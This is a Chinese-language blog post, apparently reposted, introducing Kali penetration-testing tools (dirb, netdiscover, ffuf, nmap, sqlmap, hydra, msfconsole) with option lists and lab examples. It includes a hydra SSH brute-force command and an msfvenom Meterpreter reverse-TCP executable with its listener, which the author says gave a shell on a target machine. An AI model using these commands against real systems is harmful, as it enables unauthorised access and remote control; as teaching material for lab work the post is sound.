kali中的一些工具简单使用dirb、netdiscover、ffuf、nmap、sqlmap、hydra、msfconsole

news2024/12/26 21:02:48

kali渗透常用工具

  • dirb
  • netdiscover
    • 介绍
  • ffuf
    • 介绍
  • nmap
    • 介绍
  • sqlmap
  • hydra
    • 介绍
  • msfconsole
    • msfconsole上线windows


dirb

dirb <目标URL> <字典文件> [选项]

<目标URL>:要扫描的目标URL,例如:http://example.com。
<字典文件>:用于扫描的字典文件的路径。Dirb附带了一些默认字典文件,例如:/usr/share/dirb/wordlists/common.txt。
以下是一些常用的选项:

-o <输出文件>:将扫描结果保存到指定的输出文件中。
-w:显示警告信息。
-r:递归扫描子目录。
-R <N>:限制递归层数为N。
-X <扩展名>:仅扫描指定扩展名的文件。
-x <排除扩展名>:排除指定扩展名的文件。
-S:在扫描结果中显示HTTP状态码。
-c <编码>:指定URL编码。
-t <线程数>:指定并发线程数。
这只是一些常见的选项,Dirb还有其他可用的选项。你可以使用dirb --help命令查看完整的帮助文档,其中包含所有可用的选项和示例用法。

测试

dirb http://192.168.1.201/ 

在这里插入图片描述

netdiscover

介绍

Netdiscover是一种网络扫描工具,通过ARP扫描发现活动主机,可以通过主动和被动两种模式进行ARP扫描。它主要为那些没有dhcp服务器的无线网络开发,当您进行Wardriving时。它也可以用于集线器/交换网络。建立在libnet和libpcap之上,它可以被动地检测在线主机,或通过主动发送ARP请求来搜索它们

-i device:您的网络设备
-r range:扫描给定范围而不是自动扫描。例如192.168.6.0/24,/16,/8
-l file:扫描给定文件中包含的范围列表
-p:被动模式:不发送任何内容,仅嗅探
-m file:扫描已知MAC地址和主机名的列表文件
-F filter:自定义pcap过滤器表达式(默认为“arp”)
-s time:每个ARP请求之间的睡眠时间(毫秒)
-c count:发送每个ARP请求的次数(用于丢失数据包的网络)
-n node:用于扫描的最后一个源IP八位字节(从2到253)
-d:忽略自动扫描和快速模式的主配置文件
-f:启用快速模式扫描,节省大量时间,建议用于自动
-P:以适合另一个程序解析的格式打印结果,并在主动扫描后停止
-L:类似于-P,但在主动扫描完成后继续监听
-N:不打印标题。仅当启用-P或-L时有效。
-S:启用每个请求之间的睡眠时间抑制(硬核模式)
如果未启用-r,-l或-p,则netdiscover将扫描常见的局域网地址。

测试

netdiscover -r 172.16.201/24

在这里插入图片描述

ffuf

介绍

FFUF(Fast Web Fuzzer)是一个功能强大的Web模糊测试工具,它提供了多个参数和选项,以便根据需要进行定制。

以下是一些常用的FFUF参数:

-u, --url: 指定目标URL,可以包含FUZZ关键字作为模糊测试的位置标记。
-w, --wordlist: 指定自定义字典文件的路径,用于模糊测试的目录和文件名。
-H, --header: 添加自定义HTTP请求头。
-X, --method: 指定HTTP请求方法,如GET、POST、PUT等。
-d, --data: 指定要发送的POST数据。
-r, --follow-redirects: 跟随重定向。
-c, --cookies: 添加自定义的Cookie。
-t, --threads: 指定并发线程数。
-o, --output: 指定输出文件的路径。
-mc, --match-regex: 使用正则表达式匹配响应内容。
-fc, --filter-status: 过滤特定的HTTP状态码。
-fs, --filter-size: 过滤特定的响应大小。
-fr, --filter-words: 过滤特定的响应内容。
-p, --proxy: 使用代理服务器进行扫描。
-s, --silent: 静默模式,只输出匹配的结果。
这只是一小部分可用参数的示例。你可以使用ffuf --help命令查看完整的参数列表和详细的帮助文档。

FFUF还支持其他高级功能,如自定义扩展名、自定义输出格式、自定义错误码、自定义请求内容等。你可以根据具体的需求和场景选择适当的参数和选项来使用FFUF进行定制化的模糊测试。

nmap

介绍

Nmap是一个开源的Linux命令行工具,用于扫描网络中的IP地址和端口,以及检测已安装的应用程序。它允许网络管理员找到在其网络上运行的设备,发现开放的端口和服务,并检测漏洞1。

下面是一些常用的Nmap参数组合:

获取远程主机的系统类型及开放端口:nmap -sS -P0 -sV -O 或 nmap -sS -P0 -A -v <target>,其中<target>可以是单一IP、主机名、域名或子网2
列出开放了指定端口的主机列表:nmap -sT -p 80 -oG10.0.1.* |grepopen2
在网络寻找所有在线主机:nmap -sP 10.0.1.*2
Ping指定范围内的IP地址:nmap -sP 10.0.1.100-2542

测试

nmap -sS -P0 -sV -O 192.168.1.201

在这里插入图片描述

sqlmap

sqlmap参数详解,功能使用,联合,盲注,报错各种使用

hydra

介绍

Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限1

下面是一些常用的Hydra参数:

-R:从上一次的进度开始爆破。
-s <port>:指定端口。
-l <username>:指定登录的用户名。
-L <username-list>:指定用户名字典。
-p <password>:指定密码。
-t <number>:设置线程数。
-P <passwd-list>:指定密码字典。
-v:显示详细过程。

您可以在命令行中执行hydra -h查看所有命令行选项。注意,安装完成后工具并没有包含密码字典,需要自己生成。如果您想获取一份所有服务的默认用户密码表,可以使用“dpl4hydra.sh”生成一个

爆破ssh

hydra -L u.txt -P p.txt ssh://192.168.56.101

msfconsole

msfconsole上线windows

这里直接上我最常用的
使用msfvenom 生成可执行程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.203 LPORT=4444 -f exe -o reverse_shell.exe

打开msfconsole,进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.203
run

在这里插入图片描述

将刚才生成的木马上传到靶机,执行一下,成功收到shell
在这里插入图片描述
msfconsole设计的东西很多,后面单独总结一篇吧

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/792261.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

nodeiis部署步骤

用nodejs写了一个express框架的接口&#xff0c;记录一下它如何在iis上发布部署 nodeiis部署步骤 第一步 安装nodejs 安装步骤&#xff1a;略确认安装结果&#xff1a;在cmd执行命令node -v效果图 第二步 安装iisnode 下载地址&#xff1a;iisnode下载地址&#xff08;htt…

Sentinel针对IP限流

改造限流策略的针对来源选项 import com.alibaba.csp.sentinel.adapter.spring.webmvc.callback.RequestOriginParser; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration;Configuration public class Senti…

php 中文字符串反转【字符串】

场景&#xff1a;英文字符串反转 使用 方法 strrev($str) ,但是中文字符串怎么反转呢&#xff1f; 代码 /*** 多字符 字符串反转* param string $string 字符串* param string $encoding 编码* php > 7.4 否则需要实现 mb_str_split 多字符变成字符串*/ function mb_str…

【雕爷学编程】Arduino动手做(88)---水流量传感器模块4

37款传感器与执行器的提法&#xff0c;在网络上广泛流传&#xff0c;其实Arduino能够兼容的传感器模块肯定是不止这37种的。鉴于本人手头积累了一些传感器和执行器模块&#xff0c;依照实践出真知&#xff08;一定要动手做&#xff09;的理念&#xff0c;以学习和交流为目的&am…

Centos7安装cloudreve+onlyoffice

Centos7安装cloudreveonlyoffice 1.安装onlyoffice 1.1 安装onlyoffice镜像 docker run -i -t -d -p 801:80 --restartalways -e JWT_ENABLEDfalse --name onlyoffice \-v /home/xxx/important_onlyoffice/logs:/var/log/onlyoffice \-v /home/xxx/important_onlyoffice/dat…

Linux搭建Promtail + Loki + Grafana 轻量日志监控系统

一、简介 日志监控告警系统&#xff0c;较为主流的是ELK&#xff08;Elasticsearch 、 Logstash和Kibana核心套件构成&#xff09;&#xff0c;虽然优点是功能丰富&#xff0c;允许复杂的操作。但是&#xff0c;这些方案往往规模复杂&#xff0c;资源占用高&#xff0c;操作苦…

可视化时序输入与输出|python

请帮我生成可视化图的python代码&#xff0c;输入是xxx变量&#xff0c;输出是xxx变量&#xff0c;横坐标是时间&#xff0c;输入用蓝线表示&#xff0c;输出用黄线表示&#xff0c;然后输入和输出在时间维度上是分别一个在前&#xff0c;一个在后。 import matplotlib.pyplot…

安全狗深度参与编写的《云原生安全配置基线规范》正式发布!

7月25日&#xff0c;由中国信息通信研究院、中国通信标准化协会主办的2023可信云大会在北京顺利开幕。 作为国内云原生安全领导厂商&#xff0c;安全狗受邀出席此次活动。 厦门服云信息科技有限公司&#xff08;品牌名&#xff1a;安全狗&#xff09;成立于2013年&#xff0c…

《算法竞赛·快冲300题》每日一题:“凹”

《算法竞赛快冲300题》将于2024年出版&#xff0c;是《算法竞赛》的辅助练习册。 所有题目放在自建的OJ New Online Judge。 用C/C、Java、Python三种语言给出代码&#xff0c;以中低档题为主&#xff0c;适合入门、进阶。 文章目录 题目描述题解C代码Java代码Python代码 “ 凹…

Java SpringMvc

0目录 java SpringMvc拓展 1.SpringMvc 创建工程&#xff0c;导入依赖 配置 web.xml文件 配置Spring配置文件&#xff0c;resources目录下新建applicationContext.xml 控制层配置 新建list.jsp并测试 Web.xml详解 如果required是true必须要传参 设置默…

深度揭秘C++继承:理解面向对象编程的核心概念

目录 一.继承1.继承与面向对象2.继承方式访问权限3.切片&#xff08;赋值转换&#xff09;4.作用域5.默认成员函数6.友元与静态函数7.解决菱形继承的二义性与数据冗余8.继承与组合 一.继承 1.继承与面向对象 我们知道C语言是面向过程的编程语言&#xff0c;C在C语言的基础上进…

【TiDB理论知识06】PD架构与作用

目录 一 PD的架构与功能 PD架构 PD作用 名词解释 路由功能 二 TSO的分配 概念 分配过程 性能问题 高可用问题 三 PD的调度原理 总流程 1 信息收集 2 生成调度 3 执行调度 四 Label的作用 Label的配置 给TiKV打标签 PD配置 一 PD的架构与功能 PD架构 PD集群…

机器学习|学习类型-监督学习

让我们来讨论什么是机器学习如下所示&#xff1a; 如果机器在给定任务中的性能随着经验的改善而改善&#xff0c;则可以说机器正在从过去的经验&#xff08;数据馈入&#xff09;中学习某些类别的任务。例如&#xff0c;假设一台机器必须预测客户今年是否会购买特定的产品&…

指针进阶(三)

指针进阶&#xff08;三&#xff09; 指针习题组&#xff1a; 01&#xff1a; int main() {int a[5] { 1, 2, 3, 4, 5 };int *ptr (int *)(&a 1);printf( "%d,%d", *(a 1), *(ptr - 1));return 0; }运行结果&#xff1a; 原因&#xff1a;这里a是数组名&a…

点云拟合球体

前言&#xff1a;在很多情况下&#xff0c;需要根据点云来拟合球体&#xff0c;本博文主要介绍各种方法的拟合情况及优缺点&#xff0c;希望对各位小伙伴有所帮助&#xff01; 目录 1. vtkFitImplicitFunction进行球拟合 2. 四点求解球 1. vtkFitImplicitFunction进行球拟合 …

汽车减震器弹簧阻尼模型及python代码

U为主动减震施加的力。 通过python control库&#xff0c;可以得到在单位脉冲激励下X1的响应曲线 import control import matplotlib.pyplot as pltM1 2500 M2 320 K1 80000 K2 500000 b1 350 b2 15020s control.TransferFunction.sH (b1*b2*s*s (b1*K2b2*K1)*s K1*…

foreverlasting and fried-chicken hdu7293

Problem - 7293 题目大意&#xff1a;给出一个n个点&#xff0c;m条边的图&#xff0c;问其中包含了几个下面这样的子图 1<n<1000; 思路&#xff1a;我们要找两个点u,v&#xff0c;他们至少有4个公共点&#xff0c;且至少有一个点的度数至少为6&#xff0c;其中还要判断…

【Nodejs】Koa基本使用

1.简介 koa 是由 Express 原班人马打造的&#xff0c;致力于成为一个更小、更富有表现力、更健壮的 Web 框架。使用 koa 编写 web 应用&#xff0c;通过组合不同的 generator&#xff0c;可以免除重复繁琐的回调函数嵌套&#xff0c;并极大地提升错误处理的效率。koa 不在内核方…

Python+Playwright自动化测试--标签页操作(tab)

1.简介 标签操作其实也是基于浏览器上下文&#xff08;BrowserContext&#xff09;进行操作的&#xff0c;而且宏哥在之前的BrowserContext也有提到过&#xff0c;但是有的童鞋或者小伙伴还是不清楚怎么操作&#xff0c;或者思路有点模糊&#xff0c;因此今天单独来对其进行讲…

msvcr71.dll丢失或(找不到)的解决办法

在使用电脑有时候今天没有问题隔天我们再打开软件时候&#xff0c;就遇到电脑提示msvcr71.dll丢失的问题&#xff0c;完全不知道怎么回事跟怎么解决&#xff0c;今天本文章给大家详细介绍msvcr71.dll丢失的解决方法&#xff0c;跟丢失的原因。 1.是什么msvcr71.dll msvcr71.dl…